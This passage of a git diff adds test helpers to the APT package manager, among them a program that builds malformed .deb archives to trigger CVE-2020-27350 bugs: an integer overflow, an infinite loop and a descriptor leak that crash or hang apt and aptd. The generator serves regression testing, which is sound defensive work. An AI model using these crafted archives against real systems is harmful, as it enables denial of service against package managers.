+ char error[300];
+ regerror(res, pattern, error, sizeof(error));
+ sendError(log, client, 500, *m, sendContent, error, headers);
+ continue;
+ }
+ if (regexec(pattern, filename.c_str(), 0, 0, 0) == 0)
+ {
+ filename = _config->Find("aptwebserver::overwrite::" + I->Tag + "::filename", flNotDir(filename));
+ if (filename.find("/") == std::string::npos)
+ {
+ auto directory = _config->Find("aptwebserver::overwrite::" + I->Tag + "::directory", flNotFile(filename));
+ filename = flCombine(directory, filename);
+ }
+ if (filename.empty() == false && filename[0] == '/')
+ filename.erase(0,1);
+ if (filename.empty())
+ filename = "./";
+ regfree(pattern);
+ break;
+ }
+ regfree(pattern);
+ }
+ }
+
+ // automatic retry can be tested with this
+ {
+ int failrequests = _config->FindI("aptwebserver::failrequest::" + filename, 0);
+ if (failrequests != 0)
+ {
+ --failrequests;
+ _config->Set(("aptwebserver::failrequest::" + filename).c_str(), failrequests);
+ sendError(log, client, _config->FindI("aptwebserver::failrequest", 400), *m, sendContent, "Server is configured to fail this file.", headers);
+ continue;
+ }
+ }
+
+ // deal with the request
+ unsigned int const httpsport = _config->FindI("aptwebserver::port::https", 4433);
+ std::string hosthttpsport;
+ strprintf(hosthttpsport, ":%u", httpsport);
+ if (_config->FindB("aptwebserver::support::http", true) == false &&
+ LookupTag(*m, "Host").find(hosthttpsport) == std::string::npos)
+ {
+ sendError(log, client, 400, *m, sendContent, "HTTP disabled, all requests must be HTTPS", headers);
+ continue;
+ }
+ else if (RealFileExists(filename) == true)
+ {
+ FileFd data(filename, FileFd::ReadOnly);
+ std::string condition = LookupTag(*m, "If-Modified-Since", "");
+ if (_config->FindB("aptwebserver::support::modified-since", true) == true && condition.empty() == false)
+ {
+ time_t cache;
+ if (RFC1123StrToTime(condition.c_str(), cache) == true &&
+ cache >= data.ModificationTime())
+ {
+ sendHead(log, client, 304, headers);
+ continue;
+ }
+ }
+
+ if (_config->FindB("aptwebserver::support::range", true) == true)
+ condition = LookupTag(*m, "Range", "");
+ else
+ condition.clear();
+ if (condition.empty() == false && strncmp(condition.c_str(), "bytes=", 6) == 0)
+ {
+ std::string ranges = ',' + _config->Find("aptwebserver::response-header::Accept-Ranges") + ',';
+ ranges.erase(std::remove(ranges.begin(), ranges.end(), ' '), ranges.end());
+ if (ranges.find(",bytes,") == std::string::npos)
+ {
+ // we handle it as an error here because we are a test server - a real one should just ignore it
+ sendError(log, client, 400, *m, sendContent, "Client does range requests we don't support", headers);
+ continue;
+ }
+
+ time_t cache;
+ std::string ifrange;
+ if (_config->FindB("aptwebserver::support::if-range", true) == true)
+ ifrange = LookupTag(*m, "If-Range", "");
+ bool validrange = (ifrange.empty() == true ||
+ (RFC1123StrToTime(ifrange.c_str(), cache) == true &&
+ cache <= data.ModificationTime()));
+
+ // FIXME: support multiple byte-ranges (APT clients do not do this)
+ if (condition.find(',') == std::string::npos)
+ {
+ size_t start = 6;
+ unsigned long long filestart = strtoull(condition.c_str() + start, NULL, 10);
+ // FIXME: no support for last-byte-pos being not the end of the file (APT clients do not do this)
+ size_t dash = condition.find('-') + 1;
+ unsigned long long fileend = strtoull(condition.c_str() + dash, NULL, 10);
+ unsigned long long filesize = data.FileSize();
+ if ((fileend == 0 || (fileend == filesize && fileend >= filestart)) &&
+ validrange == true)
+ {
+ if (filesize > filestart)
+ {
+ data.Skip(filestart);
+ // make sure to send content-range before conent-length
+ // as regression test for LP: #1445239
+ std::ostringstream contentrange;
+ contentrange << "Content-Range: bytes " << filestart << "-"
+ << filesize - 1 << "/" << filesize;
+ headers.push_back(contentrange.str());
+ std::ostringstream contentlength;
+ contentlength << "Content-Length: " << (filesize - filestart);
+ headers.push_back(contentlength.str());
+ sendHead(log, client, 206, headers);
+ if (sendContent == true)
+ sendFile(client, headers, data);
+ continue;
+ }
+ else
+ {
+ if (_config->FindB("aptwebserver::support::content-range", true) == true)
+ {
+ std::ostringstream contentrange;
+ contentrange << "Content-Range: bytes */" << filesize;
+ headers.push_back(contentrange.str());
+ }
+ sendError(log, client, 416, *m, sendContent, "", headers);
+ continue;
+ }
+ }
+ }
+ }
+
+ addFileHeaders(headers, data);
+ sendHead(log, client, 200, headers);
+ if (sendContent == true)
+ sendFile(client, headers, data);
+ }
+ else if (DirectoryExists(filename) == true)
+ {
+ if (filename[filename.length()-1] == '/')
+ sendDirectoryListing(log, client, filename, *m, sendContent, headers);
+ else
+ sendRedirect(log, client, 301, filename.append("/"), *m, sendContent);
+ }
+ else
+ sendError(log, client, 404, *m, sendContent, "", headers);
+ }
+
+ // if we announced a closing in the last response, do the close now
+ if (std::find(headers.begin(), headers.end(), std::string("Connection: close")) != headers.end())
+ closeConnection = true;
+
+ if (_error->PendingError() == true)
+ break;
+ _error->DumpErrors(std::cerr);
+ }
+ _error->DumpErrors(std::cerr);
+ close(client);
+ log << "CLOSE client " << client << std::endl;
+ return NULL;
+}
+ /*}}}*/
+static void loadMimeTypesFile(std::string const &filename) /*{{{*/
+{
+ if (FileExists(filename) == false)
+ return;
+
+ std::string line;
+ FileFd mimetypes(filename, FileFd::ReadOnly);
+ while (mimetypes.ReadLine(line))
+ {
+ if (line.empty() || line[0] == '#' || line.find_first_not_of(" \t\r") == std::string::npos)
+ continue;
+ std::transform(line.begin(), line.end(), line.begin(), [](char const c) { return c == ' ' ? '\t' : c; });
+ auto l = VectorizeString(line, '\t');
+ l.erase(std::remove_if(l.begin(), l.end(), [](std::string const &f) { return f.empty(); }), l.end());
+ if (l.size() < 2)
+ continue;
+ for (size_t i = 1; i < l.size(); ++i)
+ if (l[i].empty() == false)
+ _config->CndSet(std::string("aptwebserver::content-type::by-extension::").append(l[i]).c_str(), l[0]);
+ }
+}
+ /*}}}*/
+
+int main(int const argc, const char * argv[])
+{
+ CommandLine::Args Args[] = {
+ {'p', "port", "aptwebserver::port", CommandLine::HasArg},
+ {0, "request-absolute", "aptwebserver::request::absolute", CommandLine::HasArg},
+ {0, "authorization", "aptwebserver::authorization", CommandLine::HasArg},
+ {0, "proxy-authorization", "aptwebserver::proxy-authorization", CommandLine::HasArg},
+ {0, "logfiles", "aptwebserver::logfiles", CommandLine::HasArg},
+ {'c',"config-file",0,CommandLine::ConfigFile},
+ {'o',"option",0,CommandLine::ArbItem},
+ {0,0,0,0}
+ };
+
+ CommandLine CmdL(Args, _config);
+ if(CmdL.Parse(argc,argv) == false)
+ {
+ _error->DumpErrors();
+ exit(1);
+ }
+
+ if (_config->FindB("aptwebserver::content-type::mime.types", true))
+ {
+ if (_config->FindB("aptwebserver::content-type::mime.types::apt", true))
+ loadMimeTypesFile("/etc/apt/mime.types");
+
+ if (_config->FindB("aptwebserver::content-type::mime.types::home", true))
+ {
+ auto const home = getenv("HOME");
+ if (home != nullptr)
+ loadMimeTypesFile(flCombine(home, ".mime.types"));
+ }
+
+ if (_config->FindB("aptwebserver::content-type::mime.types::etc", true))
+ loadMimeTypesFile("/etc/mime.types");
+ }
+
+ // create socket, bind and listen to it {{{
+ // ignore SIGPIPE, this can happen on write() if the socket closes connection
+ signal(SIGPIPE, SIG_IGN);
+ // we don't care for our slaves, so ignore their death
+ signal(SIGCHLD, SIG_IGN);
+
+ int sock = socket(AF_INET6, SOCK_STREAM, 0);
+ if(sock < 0)
+ {
+ _error->Errno("aptwerbserver", "Couldn't create socket");
+ _error->DumpErrors(std::cerr);
+ return 1;
+ }
+
+ int port = _config->FindI("aptwebserver::port", 8080);
+
+ // ensure that we accept all connections: v4 or v6
+ int const iponly = 0;
+ setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, &iponly, sizeof(iponly));
+ // to not linger on an address
+ int const enable = 1;
+ setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable));
+
+ struct sockaddr_in6 locAddr;
+ memset(&locAddr, 0, sizeof(locAddr));
+ locAddr.sin6_family = AF_INET6;
+ locAddr.sin6_port = htons(port);
+ locAddr.sin6_addr = in6addr_any;
+
+ if (bind(sock, (struct sockaddr*) &locAddr, sizeof(locAddr)) < 0)
+ {
+ _error->Errno("aptwerbserver", "Couldn't bind");
+ _error->DumpErrors(std::cerr);
+ return 2;
+ }
+
+ if (port == 0)
+ {
+ struct sockaddr_in6 addr;
+ socklen_t addrlen = sizeof(sockaddr_in6);
+ if (getsockname(sock, (struct sockaddr*) &addr, &addrlen) != 0)
+ _error->Errno("getsockname", "Could not get chosen port number");
+ else
+ port = ntohs(addr.sin6_port);
+ }
+ std::string const portfilename = _config->Find("aptwebserver::portfile", "");
+ if (portfilename.empty() == false)
+ {
+ FileFd portfile(portfilename, FileFd::WriteOnly | FileFd::Create | FileFd::Empty);
+ std::string portcontent;
+ strprintf(portcontent, "%d", port);
+ portfile.Write(portcontent.c_str(), portcontent.size());
+ portfile.Sync();
+ }
+ _config->Set("aptwebserver::port::http", port);
+
+ FileFd pidfile;
+ if (_config->FindB("aptwebserver::fork", false) == true)
+ {
+ std::string const pidfilename = _config->Find("aptwebserver::pidfile", "aptwebserver.pid");
+ int const pidfilefd = GetLock(pidfilename);
+ if (pidfilefd < 0 || pidfile.OpenDescriptor(pidfilefd, FileFd::WriteOnly) == false)
+ {
+ _error->Errno("aptwebserver", "Couldn't acquire lock on pidfile '%s'", pidfilename.c_str());
+ _error->DumpErrors(std::cerr);
+ return 3;
+ }
+
+ pid_t child = fork();
+ if (child < 0)
+ {
+ _error->Errno("aptwebserver", "Forking failed");
+ _error->DumpErrors(std::cerr);
+ return 4;
+ }
+ else if (child != 0)
+ {
+ // successfully forked: ready to serve!
+ std::string pidcontent;
+ strprintf(pidcontent, "%d", child);
+ pidfile.Write(pidcontent.c_str(), pidcontent.size());
+ pidfile.Sync();
+ if (_error->PendingError() == true)
+ {
+ _error->DumpErrors(std::cerr);
+ return 5;
+ }
+ std::cout << "Successfully forked as " << child << std::endl;
+ return 0;
+ }
+ }
+
+ std::clog << "Serving ANY file on port: " << port << std::endl;
+
+ int const slaves = _config->FindI("aptwebserver::slaves", SOMAXCONN);
+ std::cerr << "SLAVES: " << slaves << std::endl;
+ listen(sock, slaves);
+ /*}}}*/
+
+ _config->CndSet("aptwebserver::response-header::Server", "APT webserver");
+ _config->CndSet("aptwebserver::response-header::Accept-Ranges", "bytes");
+ _config->CndSet("aptwebserver::directoryindex", "index.html");
+ APT::Configuration::getCompressors();
+
+ size_t id = 0;
+ while (true)
+ {
+ int client = accept(sock, NULL, NULL);
+ if (client == -1)
+ {
+ if (errno == EINTR)
+ continue;
+ _error->Errno("accept", "Couldn't accept client on socket %d", sock);
+ _error->DumpErrors(std::cerr);
+ return 6;
+ }
+
+ std::thread t(handleClient, client, ++id);
+ t.detach();
+ }
+ pidfile.Close();
+
+ return 0;
+}
diff --git a/test/interactive-helper/createdeb-cve-2020-27350.cc b/test/interactive-helper/createdeb-cve-2020-27350.cc
new file mode 100644
index 0000000..8b96194
--- /dev/null
+++ b/test/interactive-helper/createdeb-cve-2020-27350.cc
@@ -0,0 +1,325 @@
+#include <errno.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+struct Header
+{
+ char Name[16];
+ char MTime[12];
+ char UID[6];
+ char GID[6];
+ char Mode[8];
+ char Size[10];
+ char Magic[2];
+};
+
+struct TarHeader
+{
+ char Name[100];
+ char Mode[8];
+ char UserID[8];
+ char GroupID[8];
+ char Size[12];
+ char MTime[12];
+ char Checksum[8];
+ char LinkFlag;
+ char LinkName[100];
+ char MagicNumber[8];
+ char UserName[32];
+ char GroupName[32];
+ char Major[8];
+ char Minor[8];
+};
+
+// Call `write` and check the result.
+static void write_chk(int fd, const void *buf, size_t count)
+{
+ const ssize_t wr = write(fd, buf, count);
+ if (wr < 0)
+ {
+ const int err = errno;
+ fprintf(stderr, "Write failed: %s\n", strerror(err));
+ exit(EXIT_FAILURE);
+ }
+ if ((size_t)wr != count)
+ {
+ fprintf(stderr, "Incomplete write.\n");
+ exit(EXIT_FAILURE);
+ }
+}
+
+// Triggers a negative integer overflow at https://git.launchpad.net/ubuntu/+source/apt/tree/apt-pkg/contrib/arfile.cc?h=applied/ubuntu/focal-updates&id=4c264e60b524855b211751e1632ba48526f6b44d#n116:
+//
+// Memb->Size -= Len;
+//
+// Due to the integer overflow, the value of Memb->Size is 0xFFFFFFFFFFFFFFFF.
+// This leads to an out-of-memory error at https://git.launchpad.net/ubuntu/+source/python-apt/tree/python/arfile.cc?h=applied/ubuntu/focal-updates&id=0f7cc93acdb51d943114f1cd79002288c4ca4d24#n602:
+//
+// char* value = new char[member->Size];
+//
+// The out-of-memory error causes aptd to crash.
+static void createdeb_crash(const int fd)
+{
+ // Magic number
+ static const char *magic = "!<arch>\n";
+ write_chk(fd, magic, strlen(magic));
+
+ struct Header h;
+ memset(&h, 0, sizeof(h));
+
+ memcpy(h.Name, "control.tar ", sizeof(h.Name));
+ write_chk(fd, &h, sizeof(h));
+
+ memset(&h, 0, sizeof(h));
+ memcpy(h.Name, "data.tar ", sizeof(h.Name));
+ write_chk(fd, &h, sizeof(h));
+
+ memset(&h, 0, sizeof(h));
+ memcpy(h.Name, "#1/13 ", sizeof(h.Name));
+ strcpy(h.Size, "12");
+ write_chk(fd, &h, sizeof(h));
+ write_chk(fd, "debian-binary", 13);
+}
+
+// Triggers an infinite loop in `ARArchive::LoadHeaders()`.
+// The bug is due to the use of `strtoul` at https://git.launchpad.net/ubuntu/+source/apt/tree/apt-pkg/contrib/strutl.cc?h=applied/ubuntu/focal-updates&id=4c264e60b524855b211751e1632ba48526f6b44d#n1169:
+//
+// Res = strtoul(S,&End,Base);
+//
+// The problem is that `strtoul` accepts negative numbers. We exploit that here by setting the size string to "-60".
+static void createdeb_loop(const int fd)
+{
+ // Magic number
+ static const char *magic = "!<arch>\n";
+ write_chk(fd, magic, strlen(magic));
+
+ struct Header h;
+ memset(&h, 0, sizeof(h));
+
+ memcpy(h.Name, "#1/20 ", sizeof(h.Name));
+ strcpy(h.Size, "-60");
+ write_chk(fd, &h, sizeof(h));
+
+ char buf[20];
+ memset(buf, 0, sizeof(buf));
+ write_chk(fd, buf, sizeof(buf));
+}
+
+// Leaks a file descriptor in `debfile_new()`:
+//
+// https://git.launchpad.net/python-apt/tree/python/arfile.cc?h=2.0.0#n588
+//
+// If the .deb file is invalid then the function returns without deleting
+// `self`, which means that the file descriptor isn't closed.
+static void createdeb_leakfd(const int fd)
+{
+ // Magic number
+ static const char *magic = "!<arch>\n";
+ write_chk(fd, magic, strlen(magic));
+
+ struct Header h;
+ memset(&h, 0, sizeof(h));
+
+ memset(&h, 0, sizeof(h));
+ memcpy(h.Name, "data.tar ", sizeof(h.Name));
+ write_chk(fd, &h, sizeof(h));
+}
+
+static void set_checksum(unsigned char block[512])
+{
+ struct TarHeader *tar = (struct TarHeader *)&block[0];
+ memset(tar->Checksum, ' ', sizeof(tar->Checksum));
+ uint32_t sum = 0;
+ for (int i = 0; i < 512; i++)
+ {
+ sum += block[i];
+ }
+ snprintf(tar->Checksum, sizeof(tar->Checksum), "%o", sum);
+}
+static void base256_encode(char *Str, unsigned long long Num, unsigned int Len)
+{
+ Str += Len;
+ while (Len-- > 0) {
+ *--Str = static_cast<char>(Num & 0xff);
+ Num >>= 8;
+ }
+
+ *Str |= 0x80; // mark as base256
+}
+
+// Create a deb with a control.tar that contains a too large file or link name (GNU extension)
+static void createdeb_bigtarfilelength(const int fd, int flag, unsigned long long size = 64llu * 1024 * 1024 + 1)
+{
+ // Magic number
+ static const char *magic = "!<arch>\n";
+ write_chk(fd, magic, strlen(magic));
+
+ struct Header h;
+ memset(&h, ' ', sizeof(h));
+ memcpy(h.Name, "debian-binary/ ", sizeof(h.Name));
+ h.MTime[0] = '0';
+ h.UID[0] = '0';
+ h.GID[0] = '0';
+ memcpy(h.Mode, "644", 3);
+ h.Size[0] = '0';
+ memcpy(h.Magic, "`\n", 2);
+
+ write_chk(fd, &h, sizeof(h));
+
+ memset(&h, ' ', sizeof(h));
+ memcpy(h.Name, "data.tar/ ", sizeof(h.Name));
+ h.MTime[0] = '0';
+ h.UID[0] = '0';
+ h.GID[0] = '0';
+ memcpy(h.Mode, "644", 3);
+ h.Size[0] = '0';
+ memcpy(h.Magic, "`\n", 2);
+
+ write_chk(fd, &h, sizeof(h));
+
+ memset(&h, ' ', sizeof(h));
+ memcpy(h.Name, "control.tar/ ", sizeof(h.Name));
+ h.MTime[0] = '0';
+ h.UID[0] = '0';
+ h.GID[0] = '0';
+ memcpy(h.Mode, "644", 3);
+ memcpy(h.Size, "512", 3);
+ memcpy(h.Magic, "`\n", 2);
+
+ write_chk(fd, &h, sizeof(h));
+ union
+ {
+ struct TarHeader t;
+ unsigned char buf[512];
+ } t;
+ for (unsigned int i = 0; i < sizeof(t.buf); i++)
+ t.buf[i] = '7';
+ memcpy(t.t.Name, "control\0 ", 16);
+ memcpy(t.t.UserName, "userName", 8);
+ memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
+ t.t.LinkFlag = flag;
+ base256_encode(t.t.Size, size, sizeof(t.t.Size));
+ memset(t.t.Checksum, ' ', sizeof(t.t.Checksum));
+
+ unsigned long sum = 0;
+ for (unsigned int i = 0; i < sizeof(t.buf); i++)
+ sum += t.buf[i];
+
+ int written = sprintf(t.t.Checksum, "%lo", sum);
+ for (unsigned int i = written; i < sizeof(t.t.Checksum); i++)
+ t.t.Checksum[i] = ' ';
+
+ write_chk(fd, t.buf, sizeof(t.buf));
+}
+
+static void createdeb_test(const int fd)
+{
+ // Magic number
+ static const char *magic = "!<arch>\n";
+ write_chk(fd, magic, strlen(magic));
+
+ struct Header h;
+
+ memset(&h, 0, sizeof(h));
+ memcpy(h.Name, "data.tar ", sizeof(h.Name));
+ write_chk(fd, &h, sizeof(h));
+
+ memset(&h, 0, sizeof(h));
+ memcpy(h.Name, "debian-binary ", sizeof(h.Name));
+ strcpy(h.Size, "4");
+ write_chk(fd, &h, sizeof(h));
+ static const char *debian_binary = "2.0\n";
+ write_chk(fd, debian_binary, strlen(debian_binary));
+
+ static const char *control =
+ "Architecture: all\n"
+ "Package: kevsh\n\n";
+ memset(&h, 0, sizeof(h));
+ memcpy(h.Name, "control.tar ", sizeof(h.Name));
+ snprintf(h.Size, sizeof(h.Size), "%ld", (size_t)512 + 512);
+ write_chk(fd, &h, sizeof(h));
+
+ unsigned char block[512];
+ memset(block, 0, sizeof(block));
+ struct TarHeader *tar = (struct TarHeader *)&block[0];
+ strcpy(tar->Name, "control");
+ strcpy(tar->Mode, "644");
+ snprintf(tar->Size, sizeof(tar->Size), "%lo", strlen(control));
+ set_checksum(block);
+ write_chk(fd, block, sizeof(block));
+
+ memset(block, 0, sizeof(block));
+ strcpy((char *)block, control);
+ write_chk(fd, block, sizeof(block));
+}
+
+int main(int argc, char *argv[])
+{
+ if (argc != 3)
+ {
+ const char *progname = argc > 0 ? argv[0] : "a.out";
+ fprintf(
+ stderr,
+ "usage: %s <mode> <filename>\n"
+ "modes: loop, segv, leakfd\n",
+ progname);
+ return EXIT_FAILURE;
+ }
+
+ const char *mode = argv[1];
+ const char *filename = argv[2];
+
+ const int fd = open(filename, O_CREAT | O_WRONLY | O_TRUNC, 00644);
+ if (fd < 0)
+ {
+ const int err = errno;
+ fprintf(stderr, "Could not open %s: %s\n", filename, strerror(err));
+ return EXIT_FAILURE;
+ }
+
+ if (strcmp(mode, "crash") == 0)
+ {
+ createdeb_crash(fd);
+ }
+ else if (strcmp(mode, "loop") == 0)
+ {
+ createdeb_loop(fd);
+ }
+ else if (strcmp(mode, "leakfd") == 0)
+ {
+ createdeb_leakfd(fd);
+ }
+ else if (strcmp(mode, "long-name") == 0)
+ {
+ createdeb_bigtarfilelength(fd, 'L');
+ }
+ else if (strcmp(mode, "long-link") == 0)
+ {
+ createdeb_bigtarfilelength(fd, 'K');
+ }
+ else if (strcmp(mode, "long-control") == 0)
+ {
+ createdeb_bigtarfilelength(fd, '0');
+ }
+ else if (strcmp(mode, "too-long-control") == 0)
+ {
+ createdeb_bigtarfilelength(fd, '0', 128llu * 1024 * 1024 * 1024 + 1);
+ }
+ else if (strcmp(mode, "test") == 0)
+ {
+ createdeb_test(fd);
+ }
+ else
+ {
+ fprintf(stderr, "Mode not recognized: %s\n", mode);
+ }
+
+ close(fd);
+ return EXIT_SUCCESS;
+}
diff --git a/test/interactive-helper/extract-control.cc b/test/interactive-helper/extract-control.cc
new file mode 100644
index 0000000..a19e038
--- /dev/null
+++ b/test/interactive-helper/extract-control.cc
@@ -0,0 +1,45 @@
+#include <config.h>
+
+#include <apt-pkg/debfile.h>
+#include <apt-pkg/error.h>
+#include <apt-pkg/fileutl.h>
+
+#include <iostream>
+#include <string>
+#include <unistd.h>
+
+using namespace std;
+
+static bool ExtractMember(const char *File,const char *Member)
+{
+ FileFd Fd(File,FileFd::ReadOnly);
+ debDebFile Deb(Fd);
+ if(_error->PendingError() == true)
+ return false;
+
+ debDebFile::MemControlExtract Extract(Member);
+ if (Extract.Read(Deb) == false)
+ return false;
+
+ if (Extract.Control == 0)
+ return true;
+
+ return write(STDOUT_FILENO,Extract.Control,Extract.Length) != -1;
+}
+
+int main(int argc, const char *argv[])
+{
+ if (argc < 2)
+ {
+ cerr << "Need two arguments, a .deb and the control member" << endl;
+ return 100;
+ }
+
+ if (ExtractMember(argv[1],argv[2]) == false)
+ {
+ _error->DumpErrors();
+ return 100;
+ }
+
+ return 0;
+}
diff --git a/test/interactive-helper/libnoprofile.c b/test/interactive-helper/libnoprofile.c
new file mode 100644
index 0000000..f11b898
--- /dev/null
+++ b/test/interactive-helper/libnoprofile.c
@@ -0,0 +1,44 @@
+#define _GNU_SOURCE
+#include <stdarg.h>
+#include <stdlib.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int vprintf(const char *format, va_list ap) {
+ if (strncmp(format, "profiling:", strlen("profiling:")) == 0)
+ return 0;
+
+ static int (*func_fprintf)(const char *format, va_list ap) = NULL;
+ if (func_fprintf == NULL)
+ func_fprintf = (int (*)(const char *format, va_list ap))dlsym(RTLD_NEXT, "vprintf");
+
+ return func_fprintf(format, ap);
+}
+int printf(const char *format, ...) {
+ va_list ap;
+ va_start(ap, format);
+ int res = vprintf(format, ap);
+ va_end(ap);
+ return res;
+}
+
+int vfprintf(FILE *stream, const char *format, va_list ap) {
+ if (strncmp(format, "profiling:", strlen("profiling:")) == 0)
+ return 0;
+
+ static int (*func_vfprintf)(FILE * stream, const char *format, va_list ap) = NULL;
+ if (func_vfprintf == NULL)
+ func_vfprintf = (int (*)(FILE * stream, const char *format, va_list ap))dlsym(RTLD_NEXT, "vfprintf");
+
+ return func_vfprintf(stream, format, ap);
+}
+
+int fprintf(FILE *stream, const char *format, ...) {
+ va_list ap;
+ va_start(ap, format);
+ int res = vfprintf(stream, format, ap);
+ va_end(ap);
+ return res;
+}
diff --git a/test/interactive-helper/mthdcat.cc b/test/interactive-helper/mthdcat.cc
new file mode 100644
index 0000000..2961b20
--- /dev/null
+++ b/test/interactive-helper/mthdcat.cc
@@ -0,0 +1,22 @@
+/* Usage, mthdcat < cmds | methods/mthd
+ All this does is cat a file into the method without closing the FD when
+ the file ends */
+
+#include <config.h>
+
+#include <unistd.h>
+
+int main()
+{
+ char Buffer[4096];
+
+ while (1)
+ {
+ int Res = read(STDIN_FILENO,Buffer,sizeof(Buffer));
+ if (Res <= 0)
+ while (1) sleep(100);
+ if (write(STDOUT_FILENO,Buffer,Res) != Res)
+ break;
+ }
+ return 0;
+}
diff --git a/test/interactive-helper/networkless-install-fixes/README b/test/interactive-helper/networkless-install-fixes/README
new file mode 100644
index 0000000..e7ee2b0
--- /dev/null
+++ b/test/interactive-helper/networkless-install-fixes/README
@@ -0,0 +1,5 @@
+
+Those tests aim at making the networkless install timeout
+quicker, see
+https://wiki.ubuntu.com/NetworklessInstallationFixes
+for details
diff --git a/test/interactive-helper/networkless-install-fixes/sources.test.list b/test/interactive-helper/networkless-install-fixes/sources.test.list
new file mode 100644
index 0000000..380e180
--- /dev/null
+++ b/test/interactive-helper/networkless-install-fixes/sources.test.list
@@ -0,0 +1,25 @@
+
+# archive.ubuntu.com
+deb http://archive.ubuntu.com/ubuntu/ hardy main restricted
+deb-src http://archive.ubuntu.com/ubuntu/ hardy main restricted
+
+deb http://archive.ubuntu.com/ubuntu/ hardy-updates main restricted
+deb-src http://archive.ubuntu.com/ubuntu/ hardy-updates main restricted
+
+deb http://archive.ubuntu.com/ubuntu/ hardy universe
+deb-src http://archive.ubuntu.com/ubuntu/ hardy universe
+
+deb http://archive.ubuntu.com/ubuntu/ hardy-updates universe
+deb-src http://archive.ubuntu.com/ubuntu/ hardy-updates universe
+
+# security.ubuntu.com
+deb http://security.ubuntu.com/ubuntu/ hardy-security main restricted
+deb-src http://security.ubuntu.com/ubuntu/ hardy-security main restricted
+
+deb http://security.ubuntu.com/ubuntu/ hardy-security universe
+deb-src http://security.ubuntu.com/ubuntu/ hardy-security universe
+
+
+# archive.canonical.com
+deb http://archive.canonical.com/ubuntu/ hardy-partner universe
+deb-src http://archive.canonical.com/ubuntu/ hardy-partner universe
diff --git a/test/interactive-helper/networkless-install-fixes/test.sh b/test/interactive-helper/networkless-install-fixes/test.sh
new file mode 100755
index 0000000..809d467
--- /dev/null
+++ b/test/interactive-helper/networkless-install-fixes/test.sh
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+OPTS="-o Dir::Etc::sourcelist=./sources.test.list -o Acquire::http::timeout=20"
+
+# setup
+unset http_proxy
+iptables --flush
+
+echo "No network at all"
+ifdown eth0
+time apt-get update $OPTS 2>&1 |grep system
+ifup eth0
+echo ""
+
+echo "no working DNS (port 53 DROP)"
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+time apt-get update $OPTS 2>&1 |grep system
+iptables --flush
+echo ""
+
+echo "DNS but no access to archive.ubuntu.com (port 80 DROP)"
+iptables -A OUTPUT -p tcp --dport 80 -j DROP
+time apt-get update $OPTS 2>&1 |grep system
+iptables --flush
+echo ""
diff --git a/test/interactive-helper/rpmver.cc b/test/interactive-helper/rpmver.cc
new file mode 100644
index 0000000..b23ba28
--- /dev/null
+++ b/test/interactive-helper/rpmver.cc
@@ -0,0 +1,118 @@
+#include <config.h>
+
+#include <apt-pkg/debversion.h>
+#include <ctype.h>
+#include <rpm/misc.h>
+#include <rpm/rpmio.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+#define xisdigit(x) isdigit(x)
+#define xisalpha(x) isalpha(x)
+#define xisalnum(x) (isdigit(x) || isalpha(x))
+
+using namespace std;
+
+int rpmvercmp(const char * a, const char * b)
+{
+ char * str1, * str2;
+ char * one, * two;
+ int isnum;
+
+ /* easy comparison to see if versions are identical */
+ if (!strcmp(a, b)) return 0;
+
+ str1 = (char *)alloca(strlen(a) + 1);
+ str2 = (char *)alloca(strlen(b) + 1);
+
+ strcpy(str1, a);
+ strcpy(str2, b);
+
+ one = str1;
+ two = str2;
+
+ /* loop through each version segment of str1 and str2 and compare them */
+ while (*one && *two) {
+ while (*one && !xisalnum(*one)) one++;
+ while (*two && !xisalnum(*two)) two++;
+
+ str1 = one;
+ str2 = two;
+
+ /* grab first completely alpha or completely numeric segment */
+ /* leave one and two pointing to the start of the alpha or numeric */
+ /* segment and walk str1 and str2 to end of segment */
+ if (xisdigit(*str1)) {
+ while (*str1 && xisdigit(*str1)) str1++;
+ while (*str2 && xisdigit(*str2)) str2++;
+ isnum = 1;
+ } else {
+ while (*str1 && xisalpha(*str1)) str1++;
+ while (*str2 && xisalpha(*str2)) str2++;
+ isnum = 0;
+ }
+
+ /* save character at the end of the alpha or numeric segment */
+ /* so that they can be restored after the comparison */
+ char oldch1 = *str1;
+ *str1 = '\0';
+ char oldch2 = *str2;
+ *str2 = '\0';
+
+ /* take care of the case where the two version segments are */
+ /* different types: one numeric, the other alpha (i.e. empty) */
+ if (one == str1) return -1; /* arbitrary */
+ if (two == str2) return 1;
+
+ if (isnum) {
+ /* this used to be done by converting the digit segments */
+ /* to ints using atoi() - it's changed because long */
+ /* digit segments can overflow an int - this should fix that. */
+
+ /* throw away any leading zeros - it's a number, right? */
+ while (*one == '0') one++;
+ while (*two == '0') two++;
+
+ /* whichever number has more digits wins */
+ if (strlen(one) > strlen(two)) return 1;
+ if (strlen(two) > strlen(one)) return -1;
+ }
+
+ /* strcmp will return which one is greater - even if the two */
+ /* segments are alpha or if they are numeric. don't return */
+ /* if they are equal because there might be more segments to */
+ /* compare */
+ int rc = strcmp(one, two);
+ if (rc) return rc;
+
+ /* restore character that was replaced by null above */
+ *str1 = oldch1;
+ one = str1;
+ *str2 = oldch2;
+ two = str2;
+ }
+
+ /* this catches the case where all numeric and alpha segments have */
+ /* compared identically but the segment sepparating characters were */
+ /* different */
+ if ((!*one) && (!*two)) return 0;
+
+ /* whichever version still has characters left over wins */
+ if (!*one) return -1; else return 1;
+}
+
+int main(int argc,const char *argv[])
+{
+ printf("%i\n",strcmp(argv[1],argv[2]));
+
+ printf("'%s' <> '%s': ",argv[1],argv[2]);
+ printf("rpm: %i deb: %i\n",rpmvercmp(argv[1],argv[2]),
+ debVS.CmpFragment(argv[1],argv[1]+strlen(argv[1]),
+ argv[2],argv[2]+strlen(argv[2])));
+
+ printf("'%s' <> '%s': ",argv[2],argv[1]);
+ printf("rpm: %i deb: %i\n",rpmvercmp(argv[2],argv[1]),
+ debVS.CmpFragment(argv[2],argv[2]+strlen(argv[2]),
+ argv[1],argv[1]+strlen(argv[1])));
+ return 0;
+}
diff --git a/test/interactive-helper/teestream.h b/test/interactive-helper/teestream.h
new file mode 100644
index 0000000..058717a
